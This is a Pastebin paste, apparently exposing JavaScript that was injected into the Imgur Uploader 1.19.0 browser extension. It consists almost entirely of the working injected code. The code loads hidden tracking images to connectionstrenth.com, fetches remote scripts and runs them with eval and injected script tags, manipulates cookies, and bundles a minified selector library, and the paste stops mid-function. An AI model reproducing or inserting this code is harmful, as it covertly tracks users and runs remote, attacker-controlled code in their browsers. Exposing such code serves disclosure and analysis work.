Advertisement
Guest User

Monetization crapware injected via Imgur Uploader 1.19.0

a guest
Jun 11th, 2016
370
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //monetize your extension, skype: extension.monetizer / extensionmonetization@gmail.com
  2.  
  3. (function(f, i, j) {
  4.     var g = "__twb__72d07657ba1ad678d2";
  5.     var b = (function() {
  6.         var l = 3;
  7.         var o = parseInt("0");
  8.         var n = parseInt("0");
  9.         (function() {
  10.             var q = ["mid=", "wid=50866", "sid=", "tid=1837", "rid=LAUNCHED"];
  11.             a = (window.location.protocol == "http:" ? "http:" : "https:") + "//connectionstrenth.com/metric/?" + q.join("&");
  12.             var p = f.createElement("img");
  13.             p.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
  14.             p.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
  15.             f.getElementsByTagName("body")[0].appendChild(p);
  16.             if (typeof p.onload != j) {
  17.                 p.onload = function() {
  18.                     p.parentNode && p.parentNode.removeChild(p)
  19.                 }
  20.             }
  21.         })();
  22.         var m = false;
  23.         if (typeof(MainWindow) != "undefined") {
  24.             window.document = MainWindow.document.parentWindow
  25.         }
  26.         if (m) {
  27.             return false
  28.         }(function(d, w, uniqId, u) {
  29.             var isReady = false,
  30.                 readyQueue = [],
  31.                 div = u,
  32.                 $$ = {};
  33.             if (typeof(JSON) === u) {
  34.                 JSON = {}
  35.             }
  36.  
  37.             function onReady() {
  38.                 isReady = true;
  39.                 while (readyQueue.length > 0) {
  40.                     (readyQueue.pop())()
  41.                 }
  42.             }
  43.             if (typeof(d.getElementsByClassName) == u) {
  44.                 d.getElementsByClassName = function(cl) {
  45.                     var retnode = [];
  46.                     var myclass = new RegExp("\\b" + cl + "\\b");
  47.                     var elem = this.getElementsByTagName("*");
  48.                     for (var i = 0; i < elem.length; i++) {
  49.                         var classes = elem[i].className;
  50.                         if (myclass.test(classes)) {
  51.                             retnode.push(elem[i])
  52.                         }
  53.                     }
  54.                     return retnode
  55.                 }
  56.             }
  57.             $$ = w[uniqId] = {
  58.                 l: {},
  59.                 isIe: !!d.attachEvent,
  60.                 scriptDomain: "connectionstrenth.com",
  61.                 unixTimestampNow: Math.round(new Date().getTime() / 1000),
  62.                 optoutValue: {},
  63.                 limitsValue: {},
  64.                 currentOptoutBlock: null,
  65.                 monetizationsConfig: {},
  66.                 ready: function(callback) {
  67.                     !isReady ? readyQueue.push(callback) : callback()
  68.                 },
  69.                 createEl: function(html) {
  70.                     if (div === u) {
  71.                         div = d.createElement("div")
  72.                     }
  73.                     div.innerHTML = html;
  74.                     return div.firstChild
  75.                 },
  76.                 each: function(array, callback) {
  77.                     var i = 0,
  78.                         length = array.length;
  79.                     for (; i < length;) {
  80.                         if (callback(array[i], i++) === false) {
  81.                             return true
  82.                         }
  83.                     }
  84.                 },
  85.                 inArray: function(array, e) {
  86.                     var i = 0,
  87.                         length = array.length;
  88.                     for (; i < length; i++) {
  89.                         if (e === array[i]) {
  90.                             return true
  91.                         }
  92.                     }
  93.                     return false
  94.                 },
  95.                 filter: function(array, callback) {
  96.                     var i = 0,
  97.                         length = array.length,
  98.                         ret = [];
  99.                     for (; i < length; i++) {
  100.                         if (callback(array[i], i)) {
  101.                             ret.push(array[i])
  102.                         }
  103.                     }
  104.                     return ret
  105.                 },
  106.                 apply: function() {
  107.                     var obj = {};
  108.                     $$.each(arguments, function(arg) {
  109.                         for (var i in arg) {
  110.                             obj[i] = arg[i]
  111.                         }
  112.                     });
  113.                     return obj
  114.                 },
  115.                 xhrRequest: function(xhr, o) {
  116.                     var timeoutId = u,
  117.                         isTimedout = false;
  118.  
  119.                     function __gacb(data) {
  120.                         o.callback(data)
  121.                     }
  122.                     xhr.onreadystatechange = function() {
  123.                         if (isTimedout) {
  124.                             return
  125.                         }
  126.                         if (xhr.readyState === 4) {
  127.                             if (xhr.status === 200 && xhr.responseText) {
  128.                                 if (timeoutId) {
  129.                                     clearTimeout(timeoutId)
  130.                                 }
  131.                                 eval(xhr.responseText)
  132.                             }
  133.                         }
  134.                     };
  135.                     xhr.open("GET", o.url);
  136.                     xhr.withCredentials = false;
  137.                     timeoutId = setTimeout(function() {
  138.                         isTimedout = true;
  139.                         xhr.abort();
  140.                         $$.jsonpRequest(o)
  141.                     }, o.timeout);
  142.                     xhr.send()
  143.                 },
  144.                 jsonp: function(opts) {
  145.                     var timeoutId = u,
  146.                         isTimedout = false;
  147.                     var o = $$.apply({
  148.                         callback: function() {},
  149.                         timeout: 15000,
  150.                         onTimeout: function() {},
  151.                         data: {}
  152.                     }, opts || {});
  153.                     var r = Math.floor(Math.random() * 1000000000);
  154.                     var jsonpFunction = "__twb_cb_" + r;
  155.                     w[jsonpFunction] = function(data) {
  156.                         if (isTimedout) {
  157.                             return
  158.                         }
  159.                         if (timeoutId) {
  160.                             clearTimeout(timeoutId)
  161.                         }
  162.                         o.callback(data);
  163.                         onComplete()
  164.                     };
  165.                     var onComplete = function() {
  166.                         w[jsonpFunction] = u;
  167.                         if (s && s.parentNode) {
  168.                             s.parentNode.removeChild(s)
  169.                         }
  170.                     };
  171.                     o.url += (o.url.indexOf("?") >= 0 ? "&" : "?") + "jsonp=" + jsonpFunction + "&" + $$.toUrlParams(o.data);
  172.                     var s = $$.script(o.url);
  173.                     timeoutId = setTimeout(function() {
  174.                         isTimedout = true;
  175.                         o.onTimeout();
  176.                         onComplete()
  177.                     }, o.timeout)
  178.                 },
  179.                 toUrlParams: function(formdata, numeric_prefix, arg_separator) {
  180.                     var value, key, tmp = [];
  181.                     var _http_build_query_helper = function(key, val, arg_separator) {
  182.                         var k, tmp = [];
  183.                         if (val === true) {
  184.                             val = "1"
  185.                         } else {
  186.                             if (val === false) {
  187.                                 val = "0"
  188.                             }
  189.                         }
  190.                         if (val != null) {
  191.                             if (typeof val === "object") {
  192.                                 for (k in val) {
  193.                                     if (val[k] != null) {
  194.                                         tmp.push(_http_build_query_helper(key + "[" + k + "]", val[k], arg_separator))
  195.                                     }
  196.                                 }
  197.                                 return tmp.join(arg_separator)
  198.                             } else {
  199.                                 if (typeof val !== "function") {
  200.                                     return w.encodeURIComponent(key) + "=" + w.encodeURIComponent(val)
  201.                                 } else {
  202.                                     throw new Error("There was an error processing for http_build_query().")
  203.                                 }
  204.                             }
  205.                         } else {
  206.                             return ""
  207.                         }
  208.                     };
  209.                     if (!arg_separator) {
  210.                         arg_separator = "&"
  211.                     }
  212.                     for (key in formdata) {
  213.                         value = formdata[key];
  214.                         if (numeric_prefix && !isNaN(key)) {
  215.                             key = String(numeric_prefix) + key
  216.                         }
  217.                         var query = _http_build_query_helper(key, value, arg_separator);
  218.                         if (query !== "") {
  219.                             tmp.push(query)
  220.                         }
  221.                     }
  222.                     return tmp.join(arg_separator)
  223.                 },
  224.                 jsonpRequest: function(o) {
  225.                     var timeoutId = u,
  226.                         isTimedout = false;
  227.                     w.__gacb = function(data) {
  228.                         if (isTimedout) {
  229.                             return
  230.                         }
  231.                         if (timeoutId) {
  232.                             clearTimeout(timeoutId)
  233.                         }
  234.                         o.callback(data)
  235.                     };
  236.                     var s = $$.script(o.url);
  237.                     timeoutId = setTimeout(function() {
  238.                         isTimedout = true;
  239.                         s.parentNode.removeChild(s);
  240.                         o.onTimeout()
  241.                     }, o.timeout)
  242.                 },
  243.                 toJson: JSON.stringify || function(obj) {
  244.                     var t = typeof(obj);
  245.                     if (t != "object" || obj === null) {
  246.                         if (t == "string") {
  247.                             obj = '"' + obj + '"'
  248.                         }
  249.                         return String(obj)
  250.                     } else {
  251.                         var n, v, json = [],
  252.                             arr = (obj && obj.constructor == Array);
  253.                         for (n in obj) {
  254.                             v = obj[n];
  255.                             t = typeof(v);
  256.                             if (t == "string") {
  257.                                 v = '"' + v + '"'
  258.                             } else {
  259.                                 if (t == "object" && v !== null) {
  260.                                     v = arguments.callee(v)
  261.                                 }
  262.                             }
  263.                             json.push((arr ? "" : '"' + n + '":') + String(v))
  264.                         }
  265.                         return (arr ? "[" : "{") + String(json) + (arr ? "]" : "}")
  266.                     }
  267.                 },
  268.                 fromJson: JSON.parse || function(str) {
  269.                     if (str === "") {
  270.                         str = '""'
  271.                     }
  272.                     eval("var p=" + str + ";");
  273.                     return p
  274.                 },
  275.                 xor: function(str) {
  276.                     var i = 0,
  277.                         length = str.length,
  278.                         ret = "";
  279.                     for (; i < length;) {
  280.                         ret += String.fromCharCode(77 ^ str.charCodeAt(i++))
  281.                     }
  282.                     return ret
  283.                 },
  284.                 script: function(src, nocache) {
  285.                     var s = d.createElement("script");
  286.                     s.type = "text/javascript";
  287.                     s.src = src + (nocache === u || nocache ? (src.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime()) : "");
  288.                     d.getElementsByTagName("body")[0].appendChild(s);
  289.                     return s
  290.                 },
  291.                 includeCss: function(src) {
  292.                     var style = d.createElement("link");
  293.                     if (d.getElementsByTagName("body")[0]) {
  294.                         d.getElementsByTagName("body")[0].appendChild(style);
  295.                         style.rel = "stylesheet";
  296.                         style.type = "text/css";
  297.                         style.href = src
  298.                     }
  299.                 },
  300.                 hasClass: function(element, className) {
  301.                     return (element.getAttribute("class").indexOf(className) > -1)
  302.                 },
  303.                 addClass: function(element, className) {
  304.                     element.setAttribute("class", element.getAttribute("class") + " " + className)
  305.                 },
  306.                 removeClass: function(element, className) {
  307.                     element.setAttribute("class", element.getAttribute("class").replace(className, ""))
  308.                 },
  309.                 randomNumber: function(min, max) {
  310.                     return Math.floor(Math.random() * max) + min
  311.                 },
  312.                 eval: function(data) {
  313.                     var s = d.createElement("script");
  314.                     s.defer = true;
  315.                     s.text = data;
  316.                     (d.getElementsByTagName("script")[0] || d.documentElement.firstChild).parentNode.appendChild(s)
  317.                 },
  318.                 on: function(el, event, fn) {
  319.                     var handler = function(event) {
  320.                         fn.call(el, event || w.event)
  321.                     };
  322.                     if (el.addEventListener) {
  323.                         el.addEventListener(event, handler, false)
  324.                     } else {
  325.                         if (el.attachEvent) {
  326.                             el.attachEvent("on" + event, handler)
  327.                         }
  328.                     }
  329.                 },
  330.                 redirect: function(url, blank) {
  331.                     var a = d.createElement("a");
  332.                     a.href = url;
  333.                     if (blank) {
  334.                         a.target = "_blank"
  335.                     }
  336.                     a.__norewrite = true;
  337.                     d.body.appendChild(a);
  338.                     a.click();
  339.                     d.body.removeChild(a)
  340.                 },
  341.                 setCookie: function(name, value, opts) {
  342.                     var o = opts || {},
  343.                         expire = u;
  344.                     if (o.expire) {
  345.                         expire = new Date();
  346.                         expire.setTime(expire.getTime() + (o.expire * 1000))
  347.                     }
  348.                     document.cookie = encodeURIComponent(name) + "=" + encodeURIComponent(value) + (expire ? "; expires=" + expire.toUTCString() : "") + (o.path ? "; path=" + o.path : "") + (o.domain ? "; domain=" + o.domain : "")
  349.                 },
  350.                 getCookie: function(name) {
  351.                     var value = u;
  352.                     $$.each(d.cookie.split("; "), function(raw) {
  353.                         var parts = raw.split("=");
  354.                         var cookieName = decodeURIComponent(parts.shift());
  355.                         if (cookieName == name) {
  356.                             value = decodeURIComponent(parts.join("="));
  357.                             return false
  358.                         }
  359.                     });
  360.                     return value
  361.                 },
  362.                 encode: function(s) {
  363.                     var i = 0,
  364.                         ret = "",
  365.                         length = s.length;
  366.                     for (; i < length; i++) {
  367.                         ret += ("%" + s.charCodeAt(i).toString(16))
  368.                     }
  369.                     return ret
  370.                 },
  371.                 preventDefault: function(e) {
  372.                     if (e.preventDefault) {
  373.                         e.preventDefault()
  374.                     }
  375.                     return e.returnValue = false
  376.                 },
  377.                 remove: function(e) {
  378.                     return e.parentNode && e.parentNode.removeChild(e)
  379.                 },
  380.                 attr: function(e, name) {
  381.                     if (e.hasAttribute && e.hasAttribute(name)) {
  382.                         return e.getAttribute(name)
  383.                     } else {
  384.                         var node = e.getAttributeNode(name);
  385.                         if (node) {
  386.                             return node.value
  387.                         }
  388.                     }
  389.                     return ""
  390.                 },
  391.                 updateLimits: function(block, lifetime) {
  392.                     if (!lifetime) {
  393.                         var mConfig = {};
  394.                         if (w[uniqId].monetizationsConfig && w[uniqId].monetizationsConfig[block]) {
  395.                             mConfig = w[uniqId].monetizationsConfig[block]
  396.                         }
  397.                         lifetime = mConfig.limit
  398.                     }
  399.                     if (lifetime > 0) {
  400.                         $$.limitsValue[block] = $$.unixTimestampNow + parseInt(lifetime);
  401.                         var cookieValue = $$.toJson($$.limitsValue);
  402.                         $$.jsonp({
  403.                             url: (window.location.protocol == "http:" ? "http:" : "https:") + "//" + w[uniqId].scriptDomain + "/optout/set/limit",
  404.                             data: {
  405.                                 key: "72d07657ba1ad678d2",
  406.                                 cv: cookieValue
  407.                             },
  408.                             callback: function(response) {}
  409.                         })
  410.                     } else {}
  411.                 },
  412.                 setStartTime: function() {
  413.                     var cookieValue = $$.unixTimestampNow;
  414.                     $$.jsonp({
  415.                         url: (window.location.protocol == "http:" ? "http:" : "https:") + "//" + w[uniqId].scriptDomain + "/optout/set/strtm",
  416.                         data: {
  417.                             key: "72d07657ba1ad678d2",
  418.                             cv: cookieValue
  419.                         },
  420.                         callback: function(response) {}
  421.                     })
  422.                 },
  423.                 loadedCallback: function(code, block, custom1, custom2, custom3, custom4, custom5) {
  424.                     if (typeof block == "undefined") {
  425.                         block = ""
  426.                     }
  427.                     var params = ["mid=" + block, "wid=" + w[uniqId].tbParams.wid, "sid=" + w[uniqId].tbParams.sid, "tid=" + w[uniqId].tbParams.tid, "rid=" + code];
  428.                     if (custom1) {
  429.                         params.push("custom1=" + custom1)
  430.                     }
  431.                     if (custom2) {
  432.                         params.push("custom2=" + custom2)
  433.                     }
  434.                     if (custom3) {
  435.                         params.push("custom3=" + custom3)
  436.                     }
  437.                     if (custom4) {
  438.                         params.push("custom4=" + custom4)
  439.                     }
  440.                     if (custom5) {
  441.                         params.push("custom5=" + custom5)
  442.                     }
  443.                     var src = (window.location.protocol == "http:" ? "http:" : "https:") + "//" + w[uniqId].scriptDomain + "/metric/?" + params.join("&");
  444.                     var imgEl = d.createElement("img");
  445.                     imgEl.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
  446.                     imgEl.src = src + (src.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
  447.                     d.getElementsByTagName("body")[0].appendChild(imgEl);
  448.                     $$.on(imgEl, "load", function() {
  449.                         $$.remove(imgEl)
  450.                     })
  451.                 },
  452.                 reportSetCallback: function(response) {},
  453.                 host: function(url) {
  454.                     var m = url.match(/^https?:\/\/([^\/]+)/);
  455.                     return m ? m[1] : ""
  456.                 },
  457.                 optoutShow: function(block) {
  458.                     if ($$.tbParams.optoutUrl) {
  459.                         location.href = $$.tbParams.optoutUrl
  460.                     } else {
  461.                         if (!$$.twBarOptOut && typeof $$.twBarOptOutInit == "function") {
  462.                             $$.twBarOptOutInit()
  463.                         }
  464.                         if ($$.twBarOptOut) {
  465.                             $$.currentOptoutBlock = block;
  466.                             $$.twBarOptOut.style.display = "block";
  467.                             $$.loadedCallback("OPTOUT_SHOW", block)
  468.                         }
  469.                     }
  470.                 },
  471.                 optoutHide: function(block) {
  472.                     if ($$.twBarOptOut) {
  473.                         $$.twBarOptOut.style.display = "none"
  474.                     }
  475.                 },
  476.                 getMonetizationConfig: function(block) {
  477.                     if (w[uniqId].monetizationsConfig && w[uniqId].monetizationsConfig[block] && w[uniqId].monetizationsConfig[block].config) {
  478.                         return w[uniqId].monetizationsConfig[block].config
  479.                     }
  480.                     return {}
  481.                 }
  482.             };
  483.             if (d.addEventListener) {
  484.                 d.addEventListener("DOMContentLoaded", function() {
  485.                     onReady()
  486.                 }, false)
  487.             } else {
  488.                 if (d.attachEvent) {
  489.                     d.attachEvent("onreadystatechange", function() {
  490.                         onReady()
  491.                     })
  492.                 }
  493.             }
  494.             if (d.readyState) {
  495.                 (function() {
  496.                     if ((!$$.isIe && d.readyState === "interactive") || d.readyState === "complete") {
  497.                         onReady()
  498.                     } else {
  499.                         setTimeout(arguments.callee, 100)
  500.                     }
  501.                 })()
  502.             } else {
  503.                 var toplevel = false;
  504.                 try {
  505.                     toplevel = window.frameElement == null
  506.                 } catch (e) {}
  507.                 if (d && d.dElement && d.dElement.doScroll && toplevel) {
  508.                     (function() {
  509.                         try {
  510.                             d.dElement.doScroll("left")
  511.                         } catch (e) {
  512.                             setTimeout(arguments.callee, 100);
  513.                             return
  514.                         }
  515.                         onReady()
  516.                     })()
  517.                 }
  518.             }
  519.         })(document, window, "__twb__72d07657ba1ad678d2", undefined);;
  520.         (function(aA, q) {
  521.             var G, aD, l, v, R, U, ag, aH, S, aj, L, w, at, an, aB, k, P, av = "sizzle" + -(new Date()),
  522.                 T = aA.document,
  523.                 aE = 0,
  524.                 ao = 0,
  525.                 d = J(),
  526.                 au = J(),
  527.                 Q = J(),
  528.                 ah = false,
  529.                 N = function() {
  530.                     return 0
  531.                 },
  532.                 az = typeof q,
  533.                 ab = 1 << 31,
  534.                 Y = ({}).hasOwnProperty,
  535.                 ax = [],
  536.                 ay = ax.pop,
  537.                 W = ax.push,
  538.                 b = ax.push,
  539.                 u = ax.slice,
  540.                 j = ax.indexOf || function(aJ) {
  541.                     var aI = 0,
  542.                         e = this.length;
  543.                     for (; aI < e; aI++) {
  544.                         if (this[aI] === aJ) {
  545.                             return aI
  546.                         }
  547.                     }
  548.                     return -1
  549.                 },
  550.                 c = "checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",
  551.                 x = "[\\x20\\t\\r\\n\\f]",
  552.                 a = "(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",
  553.                 V = a.replace("w", "w#"),
  554.                 aq = "\\[" + x + "*(" + a + ")" + x + "*(?:([*^$|!~]?=)" + x + "*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|(" + V + ")|)|)" + x + "*\\]",
  555.                 s = ":(" + a + ")(?:\\(((['\"])((?:\\\\.|[^\\\\])*?)\\3|((?:\\\\.|[^\\\\()[\\]]|" + aq.replace(3, 8) + ")*)|.*)\\)|)",
  556.                 z = new RegExp("^" + x + "+|((?:^|[^\\\\])(?:\\\\.)*)" + x + "+$", "g"),
  557.                 D = new RegExp("^" + x + "*," + x + "*"),
  558.                 K = new RegExp("^" + x + "*([>+~]|" + x + ")" + x + "*"),
  559.                 al = new RegExp(x + "*[+~]"),
  560.                 B = new RegExp("=" + x + "*([^\\]'\"]*)" + x + "*\\]", "g"),
  561.                 ad = new RegExp(s),
  562.                 ae = new RegExp("^" + V + "$"),
  563.                 am = {
  564.                     ID: new RegExp("^#(" + a + ")"),
  565.                     CLASS: new RegExp("^\\.(" + a + ")"),
  566.                     TAG: new RegExp("^(" + a.replace("w", "w*") + ")"),
  567.                     ATTR: new RegExp("^" + aq),
  568.                     PSEUDO: new RegExp("^" + s),
  569.                     CHILD: new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\(" + x + "*(even|odd|(([+-]|)(\\d*)n|)" + x + "*(?:([+-]|)" + x + "*(\\d+)|))" + x + "*\\)|)", "i"),
  570.                     bool: new RegExp("^(?:" + c + ")$", "i"),
  571.                     needsContext: new RegExp("^" + x + "*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\(" + x + "*((?:-\\d)?\\d*)" + x + "*\\)|)(?=[^-]|$)", "i")
  572.                 },
  573.                 aa = /^[^{]+\{\s*\[native \w/,
  574.                 ac = /^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,
  575.                 h = /^(?:input|select|textarea|button)$/i,
  576.                 t = /^h\d$/i,
  577.                 X = /'|\\/g,
  578.                 A = new RegExp("\\\\([\\da-f]{1,6}" + x + "?|(" + x + ")|.)", "ig"),
  579.                 ap = function(e, aJ, i) {
  580.                     var aI = "0x" + aJ - 65536;
  581.                     return aI !== aI || i ? aJ : aI < 0 ? String.fromCharCode(aI + 65536) : String.fromCharCode(aI >> 10 | 55296, aI & 1023 | 56320)
  582.                 };
  583.             try {
  584.                 b.apply((ax = u.call(T.childNodes)), T.childNodes);
  585.                 ax[T.childNodes.length].nodeType
  586.             } catch (M) {
  587.                 b = {
  588.                     apply: ax.length ? function(i, e) {
  589.                         W.apply(i, u.call(e))
  590.                     } : function(aK, aJ) {
  591.                         var e = aK.length,
  592.                             aI = 0;
  593.                         while ((aK[e++] = aJ[aI++])) {}
  594.                         aK.length = e - 1
  595.                     }
  596.                 }
  597.             }
  598.  
  599.             function E(aP, aI, aT, aV) {
  600.                 var aU, aM, aN, aR, aS, aL, aK, e, aJ, aQ;
  601.                 if ((aI ? aI.ownerDocument || aI : T) !== L) {
  602.                     aj(aI)
  603.                 }
  604.                 aI = aI || L;
  605.                 aT = aT || [];
  606.                 if (!aP || typeof aP !== "string") {
  607.                     return aT
  608.                 }
  609.                 if ((aR = aI.nodeType) !== 1 && aR !== 9) {
  610.                     return []
  611.                 }
  612.                 if (at && !aV) {
  613.                     if ((aU = ac.exec(aP))) {
  614.                         if ((aN = aU[1])) {
  615.                             if (aR === 9) {
  616.                                 aM = aI.getElementById(aN);
  617.                                 if (aM && aM.parentNode) {
  618.                                     if (aM.id === aN) {
  619.                                         aT.push(aM);
  620.                                         return aT
  621.                                     }
  622.                                 } else {
  623.                                     return aT
  624.                                 }
  625.                             } else {
  626.                                 if (aI.ownerDocument && (aM = aI.ownerDocument.getElementById(aN)) && P(aI, aM) && aM.id === aN) {
  627.                                     aT.push(aM);
  628.                                     return aT
  629.                                 }
  630.                             }
  631.                         } else {
  632.                             if (aU[2]) {
  633.                                 b.apply(aT, aI.getElementsByTagName(aP));
  634.                                 return aT
  635.                             } else {
  636.                                 if ((aN = aU[3]) && aD.getElementsByClassName && aI.getElementsByClassName) {
  637.                                     b.apply(aT, aI.getElementsByClassName(aN));
  638.                                     return aT
  639.                                 }
  640.                             }
  641.                         }
  642.                     }
  643.                     if (aD.qsa && (!an || !an.test(aP))) {
  644.                         e = aK = av;
  645.                         aJ = aI;
  646.                         aQ = aR === 9 && aP;
  647.                         if (aR === 1 && aI.nodeName.toLowerCase() !== "object") {
  648.                             aL = p(aP);
  649.                             if ((aK = aI.getAttribute("id"))) {
  650.                                 e = aK.replace(X, "\\$&")
  651.                             } else {
  652.                                 aI.setAttribute("id", e)
  653.                             }
  654.                             e = "[id='" + e + "'] ";
  655.                             aS = aL.length;
  656.                             while (aS--) {
  657.                                 aL[aS] = e + o(aL[aS])
  658.                             }
  659.                             aJ = al.test(aP) && aI.parentNode || aI;
  660.                             aQ = aL.join(",")
  661.                         }
  662.                         if (aQ) {
  663.                             try {
  664.                                 b.apply(aT, aJ.querySelectorAll(aQ));
  665.                                 return aT
  666.                             } catch (aO) {} finally {
  667.                                 if (!aK) {
  668.                                     aI.removeAttribute("id")
  669.                                 }
  670.                             }
  671.                         }
  672.                     }
  673.                 }
  674.                 return aC(aP.replace(z, "$1"), aI, aT, aV)
  675.             }
  676.  
  677.             function O(e) {
  678.                 return aa.test(e + "")
  679.             }
  680.  
  681.             function J() {
  682.                 var i = [];
  683.  
  684.                 function e(aI, aJ) {
  685.                     if (i.push(aI += " ") > v.cacheLength) {
  686.                         delete e[i.shift()]
  687.                     }
  688.                     return (e[aI] = aJ)
  689.                 }
  690.                 return e
  691.             }
  692.  
  693.             function r(e) {
  694.                 e[av] = true;
  695.                 return e
  696.             }
  697.  
  698.             function m(i) {
  699.                 var aJ = L.createElement("div");
  700.                 try {
  701.                     return !!i(aJ)
  702.                 } catch (aI) {
  703.                     return false
  704.                 } finally {
  705.                     if (aJ.parentNode) {
  706.                         aJ.parentNode.removeChild(aJ)
  707.                     }
  708.                     aJ = null
  709.                 }
  710.             }
  711.  
  712.             function aF(e, aJ, aM) {
  713.                 e = e.split("|");
  714.                 var aL, aI = e.length,
  715.                     aK = aM ? null : aJ;
  716.                 while (aI--) {
  717.                     if (!(aL = v.attrHandle[e[aI]]) || aL === aJ) {
  718.                         v.attrHandle[e[aI]] = aK
  719.                     }
  720.                 }
  721.             }
  722.  
  723.             function Z(i, e) {
  724.                 var aI = i.getAttributeNode(e);
  725.                 return aI && aI.specified ? aI.value : i[e] === true ? e.toLowerCase() : null
  726.             }
  727.  
  728.             function H(i, e) {
  729.                 return i.getAttribute(e, e.toLowerCase() === "type" ? 1 : 2)
  730.             }
  731.  
  732.             function C(e) {
  733.                 if (e.nodeName.toLowerCase() === "input") {
  734.                     return e.defaultValue
  735.                 }
  736.             }
  737.  
  738.             function f(i, e) {
  739.                 var aJ = e && i,
  740.                     aI = aJ && i.nodeType === 1 && e.nodeType === 1 && (~e.sourceIndex || ab) - (~i.sourceIndex || ab);
  741.                 if (aI) {
  742.                     return aI
  743.                 }
  744.                 if (aJ) {
  745.                     while ((aJ = aJ.nextSibling)) {
  746.                         if (aJ === e) {
  747.                             return -1
  748.                         }
  749.                     }
  750.                 }
  751.                 return i ? 1 : -1
  752.             }
  753.  
  754.             function F(e) {
  755.                 return function(aI) {
  756.                     var i = aI.nodeName.toLowerCase();
  757.                     return i === "input" && aI.type === e
  758.                 }
  759.             }
  760.  
  761.             function g(e) {
  762.                 return function(aI) {
  763.                     var i = aI.nodeName.toLowerCase();
  764.                     return (i === "input" || i === "button") && aI.type === e
  765.                 }
  766.             }
  767.  
  768.             function ar(e) {
  769.                 return r(function(i) {
  770.                     i = +i;
  771.                     return r(function(aI, aM) {
  772.                         var aK, aJ = e([], aI.length, i),
  773.                             aL = aJ.length;
  774.                         while (aL--) {
  775.                             if (aI[(aK = aJ[aL])]) {
  776.                                 aI[aK] = !(aM[aK] = aI[aK])
  777.                             }
  778.                         }
  779.                     })
  780.                 })
  781.             }
  782.             U = E.isXML = function(e) {
  783.                 var i = e && (e.ownerDocument || e).documentElement;
  784.                 return i ? i.nodeName !== "HTML" : false
  785.             };
  786.             aD = E.support = {};
  787.             aj = E.setDocument = function(e) {
  788.                 var i = e ? e.ownerDocument || e : T;
  789.                 if (i === L || i.nodeType !== 9 || !i.documentElement) {
  790.                     return L
  791.                 }
  792.                 L = i;
  793.                 w = i.documentElement;
  794.                 at = !U(i);
  795.                 aD.attributes = m(function(aI) {
  796.                     aI.innerHTML = "<a href='#'></a>";
  797.                     aF("type|href|height|width", H, aI.firstChild.getAttribute("href") === "#");
  798.                     aF(c, Z, aI.getAttribute("disabled") == null);
  799.                     aI.className = "i";
  800.                     return !aI.getAttribute("className")
  801.                 });
  802.                 aD.input = m(function(aI) {
  803.                     aI.innerHTML = "<input>";
  804.                     aI.firstChild.setAttribute("value", "");
  805.                     return aI.firstChild.getAttribute("value") === ""
  806.                 });
  807.                 aF("value", C, aD.attributes && aD.input);
  808.                 aD.getElementsByTagName = m(function(aI) {
  809.                     aI.appendChild(i.createComment(""));
  810.                     return !aI.getElementsByTagName("*").length
  811.                 });
  812.                 aD.getElementsByClassName = m(function(aI) {
  813.                     aI.innerHTML = "<div class='a'></div><div class='a i'></div>";
  814.                     aI.firstChild.className = "i";
  815.                     return aI.getElementsByClassName("i").length === 2
  816.                 });
  817.                 aD.getById = m(function(aI) {
  818.                     w.appendChild(aI).id = av;
  819.                     return !i.getElementsByName || !i.getElementsByName(av).length
  820.                 });
  821.                 if (aD.getById) {
  822.                     v.find.ID = function(aK, aJ) {
  823.                         if (typeof aJ.getElementById !== az && at) {
  824.                             var aI = aJ.getElementById(aK);
  825.                             return aI && aI.parentNode ? [aI] : []
  826.                         }
  827.                     };
  828.                     v.filter.ID = function(aJ) {
  829.                         var aI = aJ.replace(A, ap);
  830.                         return function(aK) {
  831.                             return aK.getAttribute("id") === aI
  832.                         }
  833.                     }
  834.                 } else {
  835.                     delete v.find.ID;
  836.                     v.filter.ID = function(aJ) {
  837.                         var aI = aJ.replace(A, ap);
  838.                         return function(aL) {
  839.                             var aK = typeof aL.getAttributeNode !== az && aL.getAttributeNode("id");
  840.                             return aK && aK.value === aI
  841.                         }
  842.                     }
  843.                 }
  844.                 v.find.TAG = aD.getElementsByTagName ? function(aI, aJ) {
  845.                     if (typeof aJ.getElementsByTagName !== az) {
  846.                         return aJ.getElementsByTagName(aI)
  847.                     }
  848.                 } : function(aI, aM) {
  849.                     var aN, aL = [],
  850.                         aK = 0,
  851.                         aJ = aM.getElementsByTagName(aI);
  852.                     if (aI === "*") {
  853.                         while ((aN = aJ[aK++])) {
  854.                             if (aN.nodeType === 1) {
  855.                                 aL.push(aN)
  856.                             }
  857.                         }
  858.                         return aL
  859.                     }
  860.                     return aJ
  861.                 };
  862.                 v.find.CLASS = aD.getElementsByClassName && function(aJ, aI) {
  863.                     if (typeof aI.getElementsByClassName !== az && at) {
  864.                         return aI.getElementsByClassName(aJ)
  865.                     }
  866.                 };
  867.                 aB = [];
  868.                 an = [];
  869.                 if ((aD.qsa = O(i.querySelectorAll))) {
  870.                     m(function(aI) {
  871.                         aI.innerHTML = "<select><option selected=''></option></select>";
  872.                         if (!aI.querySelectorAll("[selected]").length) {
  873.                             an.push("\\[" + x + "*(?:value|" + c + ")")
  874.                         }
  875.                         if (!aI.querySelectorAll(":checked").length) {
  876.                             an.push(":checked")
  877.                         }
  878.                     });
  879.                     m(function(aJ) {
  880.                         var aI = i.createElement("input");
  881.                         aI.setAttribute("type", "hidden");
  882.                         aJ.appendChild(aI).setAttribute("t", "");
  883.                         if (aJ.querySelectorAll("[t^='']").length) {
  884.                             an.push("[*^$]=" + x + "*(?:''|\"\")")
  885.                         }
  886.                         if (!aJ.querySelectorAll(":enabled").length) {
  887.                             an.push(":enabled", ":disabled")
  888.                         }
  889.                         aJ.querySelectorAll("*,:x");
  890.                         an.push(",.*:")
  891.                     })
  892.                 }
